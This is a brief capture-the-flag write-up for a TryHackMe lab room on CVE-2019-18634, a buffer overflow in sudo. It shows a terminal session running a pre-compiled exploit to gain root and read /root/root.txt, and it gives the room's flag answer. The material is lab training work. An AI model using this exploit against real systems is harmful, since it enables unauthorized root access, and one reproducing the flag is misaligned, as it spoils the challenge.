Information
Room#
- Name: Sudo Buffer Overflow
- Profile: tryhackme.com
- Difficulty: Easy
- Description: A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series
Write-up
Buffer Overflow#
What's the flag in /root/root.txt?
Answer: THM{buff3r_0v3rfl0w_rul3s}
All we have to do here is use the pre-compiled exploit for CVE-2019-18634:
tryhackme@sudo-bof:~$ ls -lh
total 20K
-rwxr-xr-x 1 root root 18K Feb 8 2020 exploit
tryhackme@sudo-bof:~$ ./exploit
[sudo] password for tryhackme:
Sorry, try again.
# cat /root/root.txt